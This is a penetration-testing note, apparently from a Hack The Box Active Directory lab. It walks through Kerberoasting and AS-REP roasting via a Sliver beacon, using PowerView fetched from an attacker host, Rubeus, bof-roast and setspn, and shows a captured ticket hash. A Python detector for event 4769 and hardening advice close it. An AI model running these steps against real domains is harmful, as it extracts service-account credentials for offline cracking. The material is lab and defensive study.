Exploit Kerberos

Check the SPNs registered on service accounts, starting by setting up a pivot into the target network.

Kerberoasting

Using sharpsh we can enumerate Kerberoastable accounts (user accounts that have an SPN set):

# Encode base64
mczen@htb[/htb]$ echo "Get-NetUser -spn | select samaccountname,description" | base64
R2V0LU5ldFVzZXIgLXNwbiB8IHNlbGVjdCBzYW1hY2NvdW50bmFtZSxkZXNjcmlwdGlvbgo=

# Send PowerView command
sharpsh -- '-u http://10.10.14.62:8080/PowerView.ps1 -e -c "R2V0LU5ldFVzZXIgLXNwbiB8IHNlbGVjdCBzYW1hY2NvdW50bmFtZSxkZXNjcmlwdGlvbgo="'

Then use Rubeus to Kerberoast

inline-execute-assembly /home/kali/Rubeus.exe 'kerberoast /format:hashcat /user:alice /nowrap'

Or use c2tc

c2tc-kerberoast roast alices

AS-REP Roasting

inline-execute-assembly /home/kali/Rubeus.exe 'asreproast /format:hashcat /user:bob /nowrap'

Native approach

Drop into a shell and use setspn.exe -Q */* to query every SPN in the domain.

sliver (http-beacon) > shell

? This action is bad OPSEC, are you an adult? Yes

[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...
[*] Started remote shell with pid 3360

PS C:\Users\eric\Desktop> setspn.exe -Q */*
setspn.exe -Q */*
Checking domain DC=child,DC=htb,DC=local
CN=svc sql,OU=Service Account,DC=child,DC=htb,DC=local
	MSSQLSvc/srv02.child.htb.local:1433
	MSSQLSvc/srv02.child.htb.local:DB02
	MSSQLSvc/srv01.child.htb.local:1433
	MSSQLSvc/srv01.child.htb.local:DB01
CN=alice,CN=Users,DC=child,DC=htb,DC=local
	rdp/web01.child.htb.local

Using the bof-roast utility we can request Alice's service ticket and convert it into a hashcat-crackable hash with apreq2hashcat.py.

sliver (http-beacon) > bof-roast rdp/web01.child.htb.local

[*] Successfully executed bof-roast (coff-loader)
[*] Got output:
[+] Target SPN: rdp/web01.child.htb.local
[+] Got Ticket! Convert it with apreq2hashcat.py YIIGUgYJKoZIhvcSAQICAQBuggZBMIIGPaADAgEFoQMCAQ6iBwMFACAAAACjggRpYYIEZTCCBGGgAwIBBaERGw9DSElMRC5IVEIuTE9DQUyiJzAl <SNIP> CGqE=
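From the defender's side, the ticket requests made above leave Windows Security event 4769 entries on the domain controller. The detection below is an added example, not part of these notes or any of the tools they use; it runs over constructed 4769-style records (the service account names "svc sql" and "alice" and the client 10.10.14.62 mirror this walkthrough) and flags a client that pulls RC4 tickets for several user service accounts in a short window, which is the signature of a Kerberoasting run.

```python
"""Flag Kerberoasting-style TGS request bursts in Windows Security event 4769 data."""
from collections import defaultdict

# Constructed sample events (not from the page), shaped like the fields a SIEM extracts
# from event 4769: requesting account, client address, service account name (4769 logs
# the account, not the SPN), ticket encryption type (0x17 = RC4-HMAC, 0x12 = AES256)
# and event time in epoch seconds.
SAMPLE_4769 = [
    {"ts": 1000, "client": "10.10.14.62", "user": "eric",  "service": "svc sql", "etype": 0x17, "status": "0x0"},
    {"ts": 1003, "client": "10.10.14.62", "user": "eric",  "service": "alice",   "etype": 0x17, "status": "0x0"},
    {"ts": 1005, "client": "10.10.14.62", "user": "eric",  "service": "krbtgt",  "etype": 0x17, "status": "0x0"},
    {"ts": 1010, "client": "10.10.14.62", "user": "eric",  "service": "SRV02$",  "etype": 0x12, "status": "0x0"},
    {"ts": 2000, "client": "10.10.10.5",  "user": "bob",   "service": "svc sql", "etype": 0x12, "status": "0x0"},
    {"ts": 2100, "client": "10.10.10.7",  "user": "carol", "service": "alice",   "etype": 0x17, "status": "0x0"},
]

RC4_ETYPES = {0x17, 0x18}  # RC4-HMAC and RC4-HMAC-EXP: the offline-crackable types roasting tools ask for


def is_roast_candidate(ev):
    """True for a successful RC4 TGS request to a user (non-computer) service account."""
    svc = ev["service"]
    return (ev["status"] == "0x0"
            and ev["etype"] in RC4_ETYPES
            and not svc.endswith("$")        # computer accounts have long random passwords
            and svc.lower() != "krbtgt")     # krbtgt entries are TGT renewals, not service tickets


def detect_kerberoasting(events, window=300, threshold=2):
    """Return one alert per client that obtained RC4 tickets for at least `threshold`
    distinct user service accounts inside `window` seconds."""
    by_client = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if is_roast_candidate(ev):
            by_client[ev["client"]].append(ev)
    alerts = []
    for client, evs in by_client.items():
        for i, first in enumerate(evs):
            burst = [e for e in evs[i:] if e["ts"] - first["ts"] <= window]
            services = sorted({e["service"] for e in burst})
            if len(services) >= threshold:
                alerts.append({"client": client, "user": first["user"], "services": services})
                break  # one alert per client; the analyst pivots from the first burst
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoasting(SAMPLE_4769):
        print(f"[!] {a['client']} ({a['user']}) requested RC4 tickets for {', '.join(a['services'])}")
```

A single RC4 request for "alice" from 10.10.10.7 stays below the threshold on purpose; the corrective control is to move service accounts to gMSAs or long random passwords and to enforce AES so RC4 requests become the anomaly.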
